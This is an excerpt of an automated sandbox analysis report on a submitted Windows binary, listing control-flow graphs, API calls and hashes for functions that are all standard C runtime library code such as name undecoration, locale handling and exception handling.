                                                                                                                                                                                                                            control_flow_graph 307 1e4606-1e4617 308 1e462e-1e4631 307->308 309 1e4619-1e462d call 1e1730 307->309 311 1e4638-1e463b 308->311 312 1e4633-1e4636 308->312 314 1e4650-1e4660 311->314 315 1e463d-1e464f 311->315 312->311 312->314 316 1e4696-1e4698 314->316 317 1e4662-1e4666 314->317 320 1e469f 316->320 321 1e469a 316->321 318 1e467e-1e4691 call 1e1730 317->318 319 1e4668-1e4677 317->319 329 1e49e2-1e49e4 318->329 319->320 322 1e4679-1e467c 319->322 325 1e46a2-1e46a5 320->325 324 1e469d 321->324 322->324 324->320 324->325 327 1e46bd-1e46dd 325->327 328 1e46a7-1e46b8 325->328 330 1e47bb-1e47be 327->330 331 1e46e3-1e4713 call 1e106c call 1e14b4 327->331 328->329 332 1e486e-1e4879 330->332 333 1e47c4-1e47d3 330->333 350 1e4758-1e4777 call 1e0c7a call 1e14b4 331->350 351 1e4715-1e4756 call 1e434f call 1e103f call 1e14b4 call 1e1295 331->351 335 1e487b-1e489f call 1e13a1 call 1e14b4 332->335 336 1e48a1-1e48af call 1e13a1 call 1e085d 332->336 337 1e485f-1e4869 call 1e338b call 1e085d 333->337 338 1e47d9-1e4819 call 1e338b call 1e103f call 1e14b4 call 1e1295 333->338 358 1e48b4-1e48b8 335->358 336->358 337->332 338->332 376 1e477a-1e4786 350->376 351->376 362 1e48ba-1e48f2 call 1e103f call 1e14b4 call 1e14fc 358->362 363 1e48f5-1e4904 call 1e06c5 358->363 362->363 378 1e4916 363->378 379 1e4906-1e4914 363->379 382 1e478c-1e478e 376->382 383 1e4842-1e485a call 1e0c7a call 1e14b4 376->383 384 1e4918-1e4970 call 1e0f36 call 1e19f2 call 1e103f call 1e14b4 call 1e14fc call 1e1295 378->384 379->384 388 1e482c-1e483d 382->388 389 1e4794-1e47a8 382->389 409 1e49dd 383->409 419 1e4982-1e4992 384->419 420 1e4972-1e4974 384->420 396 1e49e0-1e49e1 388->396 394 1e47aa-1e47b8 call 1e0b9f 389->394 395 1e481b-1e482a call 1e0b9f call 1e085d 389->395 394->330 395->330 396->329 409->396 422 1e4994-1e49a3 call 1e1ad2 call 1e1295 419->422 423 1e49a5-1e49af call 1e1ad2 call 1e085d 419->423 420->419 421 1e4976-1e497d call 1e1295 420->421 421->419 431 1e49b4-1e49b6 422->431 423->431 433 1e49b8-1e49d1 431->433 434 1e49d3-1e49d8 call 1e0c7a 431->434 433->396 434->409
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • operator+.LIBCMT ref: 001E4621
                                                                                                                                                                                                                              • Part of subcall function 001E1730: DName::DName.LIBCMT ref: 001E1743
                                                                                                                                                                                                                              • Part of subcall function 001E1730: DName::operator+.LIBCMT ref: 001E174A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::Name::operator+operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2937105810-0
                                                                                                                                                                                                                            • Opcode ID: 35539629968e138beffd51becdf4c8dee185b9484c6757ffb25b44c6f192daa8
                                                                                                                                                                                                                            • Instruction ID: 2ffb584c078573f3cf482021f615a69eb462783f07da878c5a2a4865f205b048
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35539629968e138beffd51becdf4c8dee185b9484c6757ffb25b44c6f192daa8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAD13C75D00689AFDB14DFA9C895EEEBBF4BF18300F14406AF501EB292DB349A85CB51
                                                                                                                                                                                                                            Function 001E534E Relevance: 27.3, APIs: 18, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 436 1e534e-1e5362 437 1e5368-1e5389 436->437 438 1e56d4-1e56e1 call 1e1730 436->438 440 1e53dd-1e53e0 437->440 441 1e538b 437->441 447 1e56e4 438->447 445 1e53e6 440->445 446 1e55b1-1e55b9 call 1e136c 440->446 443 1e55be-1e55c6 call 1e154e 441->443 444 1e5391-1e5397 441->444 457 1e55cb-1e55ce 443->457 450 1e539d 444->450 451 1e55a9-1e55ac 444->451 445->451 452 1e53ec-1e53ef 445->452 446->443 456 1e56e7-1e56eb 447->456 450->440 455 1e54e6-1e5500 call 1e3231 451->455 453 1e53f5-1e53f8 452->453 454 1e55a2-1e55a7 452->454 459 1e53fe-1e5401 453->459 460 1e5593 453->460 454->457 462 1e55d4-1e55d9 455->462 471 1e5506-1e550e 455->471 461 1e552b-1e5543 457->461 457->462 459->451 465 1e5407-1e541d 459->465 463 1e5598-1e55a0 call 1e136c 460->463 466 1e567d-1e5680 461->466 467 1e5549-1e556d call 1e50c3 461->467 468 1e561b-1e5623 462->468 469 1e55db-1e55e0 462->469 463->462 472 1e54c3-1e54c6 465->472 473 1e5423-1e5426 465->473 474 1e56ba-1e56d2 call 1e50c3 466->474 475 1e5682-1e5685 466->475 498 1e556f-1e5577 call 1e154e 467->498 499 1e557c-1e5587 467->499 476 1e5628-1e5640 call 1e106c call 1e14b4 468->476 478 1e560c-1e5619 469->478 479 1e55e2-1e55e4 469->479 471->456 487 1e558c-1e5591 472->487 488 1e54cc-1e54cf 472->488 482 1e542c-1e542f 473->482 483 1e54b9-1e54be 473->483 474->447 484 1e56a8-1e56ab 475->484 485 1e5687-1e5697 call 1e136c 475->485 514 1e5643-1e5649 476->514 478->476 479->478 490 1e55e6-1e55e8 479->490 492 1e5496-1e5499 482->492 493 1e5431-1e5434 482->493 483->463 484->474 500 1e56ad-1e56b5 call 1e136c 484->500 485->474 520 1e5699-1e56a6 call 1e154e 485->520 487->463 496 1e5528-1e552a 488->496 497 1e54d1-1e54d4 488->497 490->478 501 1e55ea-1e55ec 490->501 502 1e549b-1e549e 492->502 503 1e5513-1e5518 492->503 504 1e548c-1e5491 493->504 505 1e5436-1e5438 493->505 496->461 508 1e54d6-1e54d9 497->508 509 1e5521-1e5526 497->509 498->499 511 1e5678-1e567b 499->511 500->474 501->478 513 1e55ee-1e55f1 501->513 516 1e54af-1e54b4 502->516 517 1e54a0-1e54a3 502->517 503->463 504->463 518 1e543a-1e543d 505->518 519 1e5477-1e5487 call 1e0db3 505->519 522 1e551a-1e551f 508->522 523 1e54db-1e54e1 508->523 509->463 511->456 513->514 515 1e55f3-1e55fa 513->515 530 1e566d-1e5675 514->530 531 1e564b-1e5668 call 1e103f call 1e14b4 call 1e1295 514->531 515->478 525 1e55fc-1e55fe 515->525 516->463 517->503 526 1e54a5-1e54aa 517->526 527 1e543f-1e5445 518->527 528 1e5455-1e5472 call 1e534e call 1e1754 518->528 519->462 520->474 522->463 523->503 532 1e54e3 523->532 525->478 534 1e5600-1e5602 525->534 526->463 527->503 535 1e544b-1e5450 527->535 528->447 530->511 531->530 532->455 534->478 539 1e5604-1e5606 534->539 535->463 539->478 543 1e5608-1e560a 539->543 543->478 543->514
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1129569759-0
                                                                                                                                                                                                                            • Opcode ID: 6dbec500bb396f51e2aa04729c82308d503cf4e8d877ee9f6af5757cd44cb17a
                                                                                                                                                                                                                            • Instruction ID: a0b3a753a1149f2a66717f6a37cac6fff8030dc19a9866f73912a3c4b437873a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dbec500bb396f51e2aa04729c82308d503cf4e8d877ee9f6af5757cd44cb17a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5491C171A00EC9AFCF28DF9AC885ABD7B77AF1931AF644156F412D7292D7348B408B11
                                                                                                                                                                                                                            Function 001EABC4 Relevance: 24.1, APIs: 16, Instructions: 95COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 548 1eabc4-1eabcf 549 1eabf5 548->549 550 1eabd1-1eabd5 548->550 551 1eabf7-1eabfa 549->551 550->549 552 1eabd7-1eabe8 call 1e6122 550->552 555 1eabea-1eabef call 1e5ba4 552->555 556 1eabfb-1eac0c call 1e6122 552->556 555->549 561 1eac0e-1eac0f call 1df9eb 556->561 562 1eac17-1eac29 call 1e6122 556->562 565 1eac14-1eac15 561->565 567 1eac3b-1eac57 call 1e9eec call 1ea9a8 562->567 568 1eac2b-1eac39 call 1df9eb * 2 562->568 565->555 577 1eac59-1eac70 call 1e8598 call 1e8631 call 1df9eb 567->577 578 1eac72-1eac83 call 1e8b85 567->578 568->565 594 1eaca4-1eaca6 577->594 583 1eaca8-1eacb0 578->583 584 1eac85-1eaca1 call 1df9eb call 1e8598 call 1e8631 call 1df9eb 578->584 588 1eacb2-1eacb4 583->588 584->594 588->551 594->588
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2193103758-0
                                                                                                                                                                                                                            • Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                                                                                                                                                                                            • Instruction ID: dc3d92cb45e36b7ba6639651f1d3a7185eea4fd4fe376d6605b963e6fffb064f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05210535104E80AFDB267F27D81291FBBE5EFB1B50B60842EF48957252DF32AC808752
                                                                                                                                                                                                                            Function 001992CD Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 599 1992cd-199311 GetModuleHandleW GetProcAddress * 3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001992D3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001992E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001992F2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00199303
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-1247241052
                                                                                                                                                                                                                            • Opcode ID: dc038cd96ca53a9b0488484623bebb7ef3fecf63435a069f90062a6cac2134e2
                                                                                                                                                                                                                            • Instruction ID: d5a7187d1098fa8030c5b4dbb75a129db3945fdb74396fe5e4e6df1eb12df858
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc038cd96ca53a9b0488484623bebb7ef3fecf63435a069f90062a6cac2134e2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E0EC71599211FBD7117FBAFC0DCD53AB4AB657123021361F825E26A0DBBC04818B60
                                                                                                                                                                                                                            Function 001AB85E Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                                                                                                            • Opcode ID: 9640118504dca5fc609eca447f737326d7e929f34b3ad63adee416e02cbef6e9
                                                                                                                                                                                                                            • Instruction ID: 308ea2a21fbcea147457a620cf1935658d02ad4d49831edc4724b1705a785931
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9640118504dca5fc609eca447f737326d7e929f34b3ad63adee416e02cbef6e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EB11378E08289AFDF15DF99D8C1BADBBB1BF6A314F144158E401AB297C7709D42CB60
                                                                                                                                                                                                                            Function 001E19F2 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnDecorator::getArgumentList.LIBCMT ref: 001E1A17
                                                                                                                                                                                                                              • Part of subcall function 001E15B2: Replicator::operator[].LIBCMT ref: 001E1635
                                                                                                                                                                                                                              • Part of subcall function 001E15B2: DName::operator+=.LIBCMT ref: 001E163D
                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 001E1A70
                                                                                                                                                                                                                            • DName::DName.LIBCMT ref: 001E1AC8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                            • String ID: (;C$4;C$8;C$D;C
                                                                                                                                                                                                                            • API String ID: 834187326-2621726175
                                                                                                                                                                                                                            • Opcode ID: 00b4ba88f2529d6448c9a8a500a00b8311539c59f106ea20ca9a2e191a690bfb
                                                                                                                                                                                                                            • Instruction ID: 2e881c331cd9fb6798362a77ee767f31d97d2649d18e836483c216886cfa16ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00b4ba88f2529d6448c9a8a500a00b8311539c59f106ea20ca9a2e191a690bfb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F219D34601684AFCB24DF59D4449B8BBB4FF85746B4480A5F806CB266C730EA82CB44
                                                                                                                                                                                                                            Function 001990E3 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0019912C
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199158
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00199197
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001991B4
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001991F3
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199210
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00199252
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00199275
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                                                            • Opcode ID: 15ed452b2f97c8035117caa678f8b3f0553a9704b12cbd5edbf1a9c3eceb8512
                                                                                                                                                                                                                            • Instruction ID: 7fd50b96def1b45317b9e7a953593e12522771d6718a0916f9754a99ebb74482
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ed452b2f97c8035117caa678f8b3f0553a9704b12cbd5edbf1a9c3eceb8512
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D551AE72A0020ABFEF209FA9CC45FAB7BA9EF55750F25452DF904AA150D734DD50CBA0
                                                                                                                                                                                                                            Function 0019CE02 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0019CF21
                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0019D02F
                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0019D19C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 1206542248-393685449
                                                                                                                                                                                                                            • Opcode ID: a9e2c0cfb747b7c74e302595a31fdba0bbfd418f47a2f5fd5a1fe7d0101daf74
                                                                                                                                                                                                                            • Instruction ID: 6c1376f5f82c7664429b51fa01a936260e3de9fd218dbef1ae43a87c747dee7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9e2c0cfb747b7c74e302595a31fdba0bbfd418f47a2f5fd5a1fe7d0101daf74
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EB17A72800209EFDF19DFA4D9819AEBBB5BF24310F144169F8556B212D731EA51CBD2
                                                                                                                                                                                                                            Function 0019C8D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C907
                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0019C90F
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C998
                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0019C9C3
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019CA18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
